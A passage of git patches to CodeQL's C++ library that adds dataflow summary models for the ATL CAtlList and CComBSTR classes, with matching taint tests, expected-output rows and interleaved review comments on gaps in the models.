atl.cpp:390:12:390:16 | list8 | | +| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:388:24:388:38 | call to GetTailPosition | atl.cpp:389:26:389:28 | pos | | +| atl.cpp:389:7:389:11 | ref arg list8 | atl.cpp:390:12:390:16 | list8 | | +| atl.cpp:389:7:389:11 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:390:12:390:16 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:393:27:393:28 | 10 | atl.cpp:393:27:393:29 | call to CAtlList | TAINT | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:394:7:394:11 | list9 | | +| 
atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:394:19:394:23 | list9 | | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:395:12:395:16 | list9 | | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:394:7:394:11 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | +| atl.cpp:394:7:394:11 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:394:7:394:11 | list9 | | +| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | +| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:395:12:395:16 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 2b8ef5a8c8c0c464ef97b1cc4c76107a416e85cc Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:39:26 +0000 Subject: [PATCH 0727/1267] C++: Add MaD model for 'CAtlList'. --- cpp/ql/lib/ext/CAtlList.model.yml | 25 +++++++++++++++ .../dataflow/taint-tests/atl.cpp | 32 +++++++++---------- 2 files changed, 41 insertions(+), 16 deletions(-) create mode 100644 cpp/ql/lib/ext/CAtlList.model.yml diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml new file mode 100644 index 00000000000..eb59fb8417e --- /dev/null +++ b/cpp/ql/lib/ext/CAtlList.model.yml 
@@ -0,0 +1,25 @@
+extensions:
+ - addsTo:
+ pack: codeql/cpp-all
+ extensible: summaryModel
+ data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance
+ - ["", "CAtlList", True, "AddHead", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlList", True, "AddHeadList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlList", True, "AddTail", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlList", True, "FindIndex", "", "", "Argument[0]", "ReturnValue", "taint", "manual"]
+ - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
+ - ["", "CAtlList", True, "GetAt", "", "", "Argument[0]", "ReturnValue[*@]", "taint", "manual"]
+ - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
+ - ["", "CAtlList", True, "GetHeadPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
+ - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
+ - ["", "CAtlList", True, "GetPrev", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
+ - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
+ - ["", "CAtlList", True, "GetTailPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
+ - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"]
+ - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "ReturnValue", "taint",
"manual"] + - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] + - ["", "CAtlList", True, "SwapElements", "", "", "Argument[0]", "Argument[1]", "taint", "manual"] + - ["", "CAtlList", True, "SwapElements", "", "", "Argument[1]", "Argument[0]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index b1231c13c48..fe7a5513ce7 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -297,19 +297,19 @@ void test_CAtlList() { CAtlList list(10); sink(list.GetHead()); list.AddHead(x); - sink(list.GetHead()); // $ MISSING: ir + sink(list.GetHead()); // $ ir CAtlList list2(10); list2.AddHeadList(&list); - sink(list2.GetHead()); // $ MISSING: ir + sink(list2.GetHead()); // $ ir CAtlList list3(10); list3.AddTail(x); - sink(list3.GetHead()); // $ MISSING: ir + sink(list3.GetHead()); // $ ir CAtlList list4(10); list4.AddTailList(&list3); - sink(list4.GetHead()); // $ MISSING: ir + sink(list4.GetHead()); // $ ir { CAtlList list5(10); @@ -321,26 +321,26 @@ void test_CAtlList() { CAtlList list6(10); list6.AddHead(x); auto pos = list6.FindIndex(0); - sink(list6.GetAt(pos)); // $ MISSING: ir + sink(list6.GetAt(pos)); // $ ir } { CAtlList list7(10); auto pos = list7.GetTailPosition(); list7.InsertAfter(pos, x); - sink(list7.GetHead()); // $ MISSING: ir + sink(list7.GetHead()); // $ ir } { CAtlList list8(10); auto pos = list8.GetTailPosition(); list8.InsertBefore(pos, x); - sink(list8.GetHead()); // $ MISSING: ir + sink(list8.GetHead()); // $ ir } { CAtlList list9(10); list9.SetAt(list9.GetHeadPosition(), x); - sink(list9.GetHead()); // $ MISSING: ir + sink(list9.GetHead()); // $ ir } } 
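Review bot: The `SetAt` row uses kind `taint` for `Argument[*@1]` to `Argument[-1].Element[@]`, whereas the other rows that store an element (`AddHead`, `AddTail`, `InsertAfter`, `InsertBefore`) and the `SetAt` row of the CAtlArray model use `value`; unless there is a reason for the difference it should read `- ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"]`. `GetNext` and `GetPrev` return `E&` in the test stub but are modelled as `Argument[-1]` to `ReturnValue` with kind `taint` rather than reading `Element[@]` like `GetAt`, `GetHead` and `GetTail`, and neither is called in test_CAtlList. `RemoveHead` and `RemoveTail`, which return `E` in the stub, have no row, so elements taken out of the list that way are presumably not tracked. A gap in a summary model shows up as missed results in taint queries rather than as an error, so each of these is worth either a row with a test or a comment saying it is deliberately left out.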
@@ -349,19 +349,19 @@ void test_CAtlList() { CAtlList list(10); sink(list.GetHead()); list.AddHead(x); - sink(list.GetHead()); // $ MISSING: ir + sink(list.GetHead()); // $ ir CAtlList list2(10); list2.AddHeadList(&list); - sink(list2.GetHead()); // $ MISSING: ir + sink(list2.GetHead()); // $ ir CAtlList list3(10); list3.AddTail(x); - sink(list3.GetHead()); // $ MISSING: ir + sink(list3.GetHead()); // $ ir CAtlList list4(10); list4.AddTailList(&list3); - sink(list4.GetHead()); // $ MISSING: ir + sink(list4.GetHead()); // $ ir { CAtlList list5(10); @@ -373,26 +373,26 @@ void test_CAtlList() { CAtlList list6(10); list6.AddHead(x); auto pos = list6.FindIndex(0); - sink(list6.GetAt(pos)); // $ MISSING: ir + sink(list6.GetAt(pos)); // $ ir } { CAtlList list7(10); auto pos = list7.GetTailPosition(); list7.InsertAfter(pos, x); - sink(list7.GetHead()); // $ MISSING: ir + sink(list7.GetHead()); // $ ir } { CAtlList list8(10); auto pos = list8.GetTailPosition(); list8.InsertBefore(pos, x); - sink(list8.GetHead()); // $ MISSING: ir + sink(list8.GetHead()); // $ ir } { CAtlList list9(10); list9.SetAt(list9.GetHeadPosition(), x); - sink(list9.GetHead()); // $ MISSING: ir + sink(list9.GetHead()); // $ ir } } } From 68ee8da574f56f160d61371f6eac44801c2ae2ad Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 12:04:29 +0000 Subject: [PATCH 0728/1267] C++: Add failing tests with 'CComBSTR'. --- .../dataflow/taint-tests/atl.cpp | 129 +++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 130 ++++++++++++++++++ 2 files changed, 259 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index fe7a5513ce7..0eb636082e2 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -396,3 +396,132 @@ void test_CAtlList() { } } } + +struct IUnknown { }; + +struct ISequentialStream : public IUnknown { }; + +struct IStream : public ISequentialStream { }; + +struct CComBSTR { + CComBSTR() throw(); + CComBSTR(const CComBSTR& src); + CComBSTR(int nSize); + CComBSTR(int nSize, LPCOLESTR sz); + CComBSTR(int nSize, LPCSTR sz); + CComBSTR(LPCOLESTR pSrc); + CComBSTR(LPCSTR pSrc); + CComBSTR(CComBSTR&& src) throw(); + ~CComBSTR(); + + HRESULT Append(const CComBSTR& bstrSrc) throw(); + HRESULT Append(wchar_t ch) throw(); + HRESULT Append(char ch) throw(); + HRESULT Append(LPCOLESTR lpsz) throw(); + HRESULT Append(LPCSTR lpsz) throw(); + HRESULT Append(LPCOLESTR lpsz, int nLen) throw(); + HRESULT AppendBSTR(BSTR p) throw(); + HRESULT AppendBytes(const char* lpsz, int nLen) throw(); + HRESULT ArrayToBSTR(const SAFEARRAY* pSrc) throw(); + HRESULT AssignBSTR(const BSTR bstrSrc) throw(); + void Attach(BSTR src) throw(); + HRESULT BSTRToArray(LPSAFEARRAY ppArray) throw(); + unsigned int ByteLength() const throw(); + BSTR Copy() const throw(); + HRESULT CopyTo(BSTR* pbstr) throw(); + + HRESULT CopyTo(VARIANT* pvarDest) throw(); + BSTR Detach() throw(); + void Empty() throw(); + unsigned int Length() const throw(); + bool LoadString(HINSTANCE hInst, UINT nID) throw(); + bool LoadString(UINT nID) throw(); + HRESULT ReadFromStream(IStream* pStream) throw(); + HRESULT ToUpper() throw(); + HRESULT WriteToStream(IStream* pStream) throw(); + + operator BSTR() const throw(); + BSTR* operator&() throw(); + + CComBSTR& operator+= (const CComBSTR& bstrSrc); + CComBSTR& operator+= (const LPCOLESTR pszSrc); + + BSTR m_str; +}; + +LPSAFEARRAY getSafeArray() { + SAFEARRAY* safe = new SAFEARRAY; + safe->pvData = indirect_source(); + return safe; +} + +void test_CComBSTR() { + char* x = indirect_source(); + { + CComBSTR b(x); + sink(b.m_str); // $ MISSING: ir + + CComBSTR b2(b); + sink(b2.m_str); // $ MISSING: ir + } + { + CComBSTR b(10, x); + sink(b.m_str); // $ MISSING: ir 
+ } + { + CComBSTR b(x); + + CComBSTR b2; + sink(b2.m_str); + b2 += b; + sink(b2.m_str); // $ MISSING: ir + + CComBSTR b3; + b3 += x; + sink(b3.m_str); // $ MISSING: ir + sink(static_cast(b3)); // $ MISSING: ir + sink(**&b3); // $ MISSING: ir + + CComBSTR b4; + b4.Append(source()); + sink(b4.m_str); // $ MISSING: ir + + CComBSTR b5; + b5.AppendBSTR(b4.m_str); + sink(b5.m_str); // $ MISSING: ir + + CComBSTR b6; + b6.AppendBytes(x, 10); + sink(b6.m_str); // $ MISSING: ir + + CComBSTR b7; + b7.ArrayToBSTR(getSafeArray()); + sink(b7.m_str); // $ MISSING: ir + + CComBSTR b8; + b8.AssignBSTR(b7.m_str); + sink(b8.m_str); // $ MISSING: ir + + CComBSTR b9; + SAFEARRAY safe; + b9.Append(source()); + b9.BSTRToArray(&safe); + sink(safe.pvData); // $ MISSING: ir + + sink(b9.Copy()); // $ MISSING: ir + } + + wchar_t* w = indirect_source(); + { + CComBSTR b(w); + sink(b.m_str); // $ MISSING: ir + + CComBSTR b2; + b2.Attach(w); + sink(b2.m_str); // $ MISSING: ir + } + { + CComBSTR b(10, w); + sink(b.m_str); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 5c7da7123ad..becba8e527b 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
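Review bot: `test_CComBSTR` never calls `CopyTo`, `Detach`, `LoadString`, `ReadFromStream` or `WriteToStream`, although the stub declares all of them, so any summary later written for those members has no expectation to confirm or contradict it. `ReadFromStream` in particular is where stream-supplied data enters the string, which makes it the case most worth pinning down. A block in the style of the existing ones, such as `CComBSTR b10; b10.ReadFromStream(stream); sink(b10.m_str);` with a tainted `IStream*`, would close the gap. `test_CComSafeArray` in the later commit has the same gap for `Attach`, `CopyFrom`, `CopyTo`, `MultiDimGetAt` and `MultiDimSetAt`.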
@@ -506,6 +506,136 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | | atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | | atl.cpp:395:12:395:16 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:453:21:453:33 | new | atl.cpp:454:3:454:6 | safe | | +| atl.cpp:453:21:453:33 | new | atl.cpp:455:10:455:13 | safe | | +| atl.cpp:454:3:454:6 | safe [post update] | atl.cpp:455:10:455:13 | safe | | +| atl.cpp:454:3:454:40 | ... = ... | atl.cpp:454:9:454:14 | pvData [post update] | | +| atl.cpp:454:18:454:38 | call to indirect_source | atl.cpp:454:3:454:40 | ... = ... | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:461:16:461:16 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:468:20:468:20 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:472:16:472:16 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:480:11:480:11 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:494:20:494:20 | x | | +| atl.cpp:461:16:461:16 | x | atl.cpp:461:16:461:17 | call to CComBSTR | TAINT | +| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:462:10:462:10 | b | | +| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:464:17:464:17 | b | | +| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:466:3:466:3 | b | | +| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:464:17:464:17 | b | | +| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:466:3:466:3 | b | | +| atl.cpp:462:12:462:16 | ref arg m_str | atl.cpp:465:13:465:17 | m_str | | +| atl.cpp:464:17:464:17 | b | atl.cpp:464:17:464:18 | call to CComBSTR | | +| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:465:10:465:11 | b2 | | +| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:466:3:466:3 | b2 | | +| atl.cpp:465:10:465:11 | b2 [post update] | atl.cpp:466:3:466:3 | b2 | | +| atl.cpp:468:16:468:21 | call to 
CComBSTR | atl.cpp:469:10:469:10 | b | | +| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:470:3:470:3 | b | | +| atl.cpp:469:10:469:10 | b [post update] | atl.cpp:470:3:470:3 | b | | +| atl.cpp:472:16:472:16 | x | atl.cpp:472:16:472:17 | call to CComBSTR | TAINT | +| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:476:11:476:11 | b | | +| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:512:3:512:3 | b | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:475:10:475:11 | b2 | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:476:5:476:6 | b2 | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:477:10:477:11 | b2 | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:476:5:476:6 | b2 | | +| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:477:10:477:11 | b2 | | +| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:475:13:475:17 | ref arg m_str | atl.cpp:477:13:477:17 | m_str | | +| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:477:10:477:11 | b2 | | +| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:480:5:480:6 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:481:10:481:11 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:482:28:482:29 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:481:10:481:11 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:482:28:482:29 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:480:11:480:11 | x | atl.cpp:480:11:480:11 | call to CComBSTR | TAINT | +| 
atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:482:28:482:29 | b3 | | +| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:483:11:483:14 | * ... | atl.cpp:483:10:483:14 | * ... | TAINT | +| atl.cpp:483:12:483:12 | call to operator& | atl.cpp:483:11:483:14 | * ... | TAINT | +| atl.cpp:483:13:483:14 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:486:5:486:6 | b4 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:487:10:487:11 | b4 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:490:19:490:20 | b4 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:487:10:487:11 | b4 | | +| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:490:19:490:20 | b4 | | +| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:490:19:490:20 | b4 | | +| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:487:13:487:17 | ref arg m_str | atl.cpp:490:22:490:26 | m_str | | +| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:490:5:490:6 | b5 | | +| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:491:10:491:11 | b5 | | +| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b5 | | +| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:491:10:491:11 | b5 | | +| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:512:3:512:3 | b5 | | +| atl.cpp:490:19:490:20 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:491:10:491:11 | b5 [post update] | atl.cpp:512:3:512:3 | b5 | | +| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:494:5:494:6 | b6 | | +| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:495:10:495:11 | b6 | | 
+| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b6 | | +| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:495:10:495:11 | b6 | | +| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:512:3:512:3 | b6 | | +| atl.cpp:495:10:495:11 | b6 [post update] | atl.cpp:512:3:512:3 | b6 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:498:5:498:6 | b7 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:499:10:499:11 | b7 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:502:19:502:20 | b7 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:499:10:499:11 | b7 | | +| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:502:19:502:20 | b7 | | +| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:502:19:502:20 | b7 | | +| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:499:13:499:17 | ref arg m_str | atl.cpp:502:22:502:26 | m_str | | +| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:502:5:502:6 | b8 | | +| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:503:10:503:11 | b8 | | +| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b8 | | +| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:503:10:503:11 | b8 | | +| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:512:3:512:3 | b8 | | +| atl.cpp:502:19:502:20 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:503:10:503:11 | b8 [post update] | atl.cpp:512:3:512:3 | b8 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:507:5:507:6 | b9 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:508:5:508:6 | b9 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:511:10:511:11 | b9 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:506:15:506:18 | safe | atl.cpp:508:21:508:24 | safe | | +| atl.cpp:506:15:506:18 | safe | atl.cpp:509:10:509:13 | safe | | +| atl.cpp:507:5:507:6 | 
ref arg b9 | atl.cpp:508:5:508:6 | b9 | | +| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | +| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:508:21:508:24 | safe [inner post update] | | +| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:509:10:509:13 | safe | | +| atl.cpp:508:21:508:24 | safe | atl.cpp:508:20:508:24 | & ... | | +| atl.cpp:511:10:511:11 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:516:16:516:16 | w | | +| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:520:15:520:15 | w | | +| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:524:20:524:20 | w | | +| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:520:15:520:15 | w | | +| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:524:20:524:20 | w | | +| atl.cpp:516:16:516:16 | w | atl.cpp:516:16:516:17 | call to CComBSTR | TAINT | +| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:517:10:517:10 | b | | +| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:522:3:522:3 | b | | +| atl.cpp:517:10:517:10 | b [post update] | atl.cpp:522:3:522:3 | b | | +| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:520:5:520:6 | b2 | | +| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:521:10:521:11 | b2 | | +| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:522:3:522:3 | b2 | | +| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:521:10:521:11 | b2 | | +| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:522:3:522:3 | b2 | | +| atl.cpp:520:15:520:15 | ref arg w | atl.cpp:524:20:524:20 | w | | +| atl.cpp:521:10:521:11 | b2 [post update] | atl.cpp:522:3:522:3 | b2 | | +| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | +| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | +| atl.cpp:525:10:525:10 | 
b [post update] | atl.cpp:526:3:526:3 | b | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 9b004848a32533216fd40602e9acc792437b6e01 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 12:07:01 +0000 Subject: [PATCH 0729/1267] C++: Add MaD model for 'CComBSTR'. --- cpp/ql/lib/ext/CComBSTR.model.yml | 33 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 8 ++--- 2 files changed, 37 insertions(+), 4 deletions(-) create mode 100644 cpp/ql/lib/ext/CComBSTR.model.yml diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml new file mode 100644 index 00000000000..b578956edec --- /dev/null +++ b/cpp/ql/lib/ext/CComBSTR.model.yml 
@@ -0,0 +1,33 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CComBSTR", True, "CComBSTR", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "Append", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(LPCOLESTR,int)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "AppendBytes", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "AppendBSTR", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[*0].Field[*pvData]", "value", 
